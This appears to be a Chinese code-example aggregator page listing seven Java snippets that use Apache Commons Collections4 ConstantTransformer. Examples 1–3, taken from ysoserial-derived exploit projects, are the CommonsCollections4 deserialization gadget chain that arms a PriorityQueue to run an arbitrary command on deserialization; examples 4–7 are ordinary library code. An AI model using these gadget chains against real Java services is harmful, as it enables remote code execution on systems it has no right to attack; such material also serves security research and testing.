• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

Java ConstantTransformer类代码示例

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

本文整理汇总了Java中org.apache.commons.collections4.functors.ConstantTransformer的典型用法代码示例。如果您正苦于以下问题:Java ConstantTransformer类的具体用法?Java ConstantTransformer怎么用?Java ConstantTransformer使用的例子?那么恭喜您, 这里精选的类代码示例或许可以为您提供帮助。



ConstantTransformer类属于org.apache.commons.collections4.functors包,在下文中一共展示了ConstantTransformer类的7个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Java代码示例。

示例1: getObject

import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
public Queue<Object> getObject(final String command) throws Exception {
	Object templates = Gadgets.createTemplatesImpl(command);

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
	queue.add(1);
	queue.add(1);

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
}
 
开发者ID:hucheat,项目名称:APacheSynapseSimplePOC,代码行数:30,代码来源:CommonsCollections4.java


示例2: getObject

import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
public Queue<Object> getObject(CmdExecuteHelper cmdHelper) throws Exception {
    
	Object templates = Gadgets.createTemplatesImpl(cmdHelper.getCommandArray());

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
	queue.add(1);
	queue.add(1);

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
}
 
开发者ID:pimps,项目名称:ysoserial-modified,代码行数:31,代码来源:CommonsCollections4.java


示例3: getObject

import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
public Queue<Object> getObject(final String command) throws Exception {
	TemplatesImpl templates = Gadgets.createTemplatesImpl(command);

	ConstantTransformer constant = new ConstantTransformer(String.class);

	// mock method name until armed
	Class[] paramTypes = new Class[] { String.class };
	Object[] args = new Object[] { "foo" };
	InstantiateTransformer instantiate = new InstantiateTransformer(
			paramTypes, args);

	// grab defensively copied arrays
	paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
	args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

	ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

	// create queue with numbers
	PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
	queue.add(1);
	queue.add(1);

	// swap in values to arm
	Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
	paramTypes[0] = Templates.class;
	args[0] = templates;

	return queue;
}
 
开发者ID:NetSPI,项目名称:JavaSerialKiller,代码行数:30,代码来源:CommonsCollections4.java


示例4: defaultedMap

import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
 * Factory method to create a defaulting map.
 * <p>
 * The value specified is returned when a missing key is found.
 *
 * @param <K>  the key type
 * @param <V>  the value type
 * @param map  the map to decorate, must not be null
 * @param defaultValue  the default value to return when the key is not found
 * @return a new defaulting map
 * @throws NullPointerException if map is null
 * @since 4.0
 */
public static <K, V> DefaultedMap<K, V> defaultedMap(final Map<K, V> map, final V defaultValue) {
    return new DefaultedMap<K, V>(map, ConstantTransformer.constantTransformer(defaultValue));
}
 
开发者ID:funkemunky,项目名称:HCFCore,代码行数:17,代码来源:DefaultedMap.java


示例5: DefaultedMap

import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
 * Constructs a new empty <code>DefaultedMap</code> that decorates
 * a <code>HashMap</code>.
 * <p>
 * The object passed in will be returned by the map whenever an
 * unknown key is requested.
 *
 * @param defaultValue  the default value to return when the key is not found
 */
public DefaultedMap(final V defaultValue) {
    this(ConstantTransformer.constantTransformer(defaultValue));
}
 
开发者ID:funkemunky,项目名称:HCFCore,代码行数:13,代码来源:DefaultedMap.java


示例6: nullTransformer

import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
 * Gets a transformer that always returns null.
 *
 * @param <I>  the input type
 * @param <O>  the output type
 * @return the transformer
 * @see ConstantTransformer
 */
public static <I, O> Transformer<I, O> nullTransformer() {
    return ConstantTransformer.nullTransformer();
}
 
开发者ID:funkemunky,项目名称:HCFCore,代码行数:12,代码来源:TransformerUtils.java


示例7: constantTransformer

import org.apache.commons.collections4.functors.ConstantTransformer; //导入依赖的package包/类
/**
 * Creates a Transformer that will return the same object each time the
 * transformer is used.
 *
 * @param <I>  the input type
 * @param <O>  the output type
 * @param constantToReturn  the constant object to return each time in the transformer
 * @return the transformer.
 * @see ConstantTransformer
 */
public static <I, O> Transformer<I, O> constantTransformer(final O constantToReturn) {
    return ConstantTransformer.constantTransformer(constantToReturn);
}
 
开发者ID:funkemunky,项目名称:HCFCore,代码行数:14,代码来源:TransformerUtils.java



注:本文中的org.apache.commons.collections4.functors.ConstantTransformer类示例整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Java TokenizedPhraseQueryNode类代码示例发布时间:2022-05-22
下一篇:
Java EGL类代码示例发布时间:2022-05-22
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap